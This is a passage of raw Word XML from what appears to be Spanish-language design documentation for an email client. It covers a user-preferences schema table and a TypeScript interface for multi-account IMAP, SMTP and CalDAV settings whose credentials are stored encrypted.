            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">preferences.timezone</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">-</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Zona horaria IANA</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">preferences.theme</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">-</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Tema: light, dark, system</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">preferences.pageSize</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">number</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">-</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Emails por página (10-200)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">preferences.enableThreading</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">-</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Agrupar por conversación</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">preferences.defaultSignature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">-</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Firma HTML por defecto</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">createdAt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">TTL (2 años)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Fecha de creación</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Índices:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">{primaryEmail: 1}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— unique, para lookup por email principal.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">{createdAt: 1}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— TTL index de 2 años para cleanup de cuentas inactivas.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="79"/>
    <w:bookmarkStart w:id="80" w:name="colección-accounts-multi-cuenta-imapsmtp"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.2 Colección</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">accounts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— Multi-Cuenta IMAP/SMTP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La colección</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">accounts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">almacena la configuración de cada cuenta de correo vinculada a un usuario. El diseño soporta multi-cuenta desde el origen: un usuario puede tener múltiples accounts (Gmail personal, Exchange corporativo, IMAP propio), cada una con su propia configuración de servidor y credenciales encriptadas.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">interface</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> IAccount {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  _id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> ObjectId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/** Referencia al usuario propietario */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  userId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> ObjectId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/** Nombre descriptivo de la cuenta (editable por el usuario)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Dirección de email completa */</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Si es la cuenta principal (por defecto para envío) */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  isPrimary</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/** Configuración del servidor IMAP */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  imap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/** Hostname del servidor IMAP */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    host</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Puerto del servidor (143 o 993) */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    port</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CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/** Si usar TLS desde el inicio (true para 993) */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    secure</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/** Método de autenticación */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    authMethod</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="String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'oauth2'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/** Username para autenticación IMAP */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    authUser</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w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">     * Password encriptado con AES-256-GCM o token de acceso OAuth2.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">     * El plugin mongoose-aes-encryption maneja encriptación transparente</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">     * a nivel de campo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;sup&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">[154]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/sup&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">     */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    authCredentials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encrypted</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/** Si usar compresión IMAP (COMPRESS=DEFLATE) */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    compress</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/** Extensiones soportadas por el servidor (detectadas en conexión) */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    capabilities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br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/** Si el servidor soporta CONDSTORE para sync incremental */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    hasCondstore</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/** Si el servidor soporta QRESYNC para re-sincronización rápida </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;sup&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">[39]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/sup&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    hasQresync</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/** Si el servidor soporta IMAP IDLE para notificaciones push </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;sup&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">[63]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/sup&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    hasIdle</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/** Protocolo preferido: imap o jmap (auto-detectado) */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    preferredProtocol</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'imap'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">|</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'jmap'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Configuración del servidor SMTP para envío */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  smtp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/** Hostname del servidor SMTP */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    host</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Puerto (25, 587 con STARTTLS, o 465 con TLS) */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    port</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CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/** Si usar TLS desde el inicio */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    secure</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/** Método de autenticación */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    authMethod</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="String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'oauth2'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/** Username para autenticación SMTP */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    authUser</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Password encriptado o token OAuth2 */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    authCredentials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encrypted &lt;sup&gt;[154]&lt;/sup&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/** Configuración del servidor CalDAV (opcional) */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  caldav</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">?:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/** URL base del servidor CalDAV */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    baseUrl</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Username */</w:t>
      </w:r>
      <w:r>
        <w:br/>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Password encriptado */</w:t>
      </w:r>
      <w:r>
        <w:br/>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encrypted &lt;sup&gt;[154]&lt;/sup&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/** Estado de la cuenta */</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'syncing'</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rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'disabled'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/** Mensaje de error si status === 'error' */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  lastError</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Fecha de la última sincronización exitosa */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
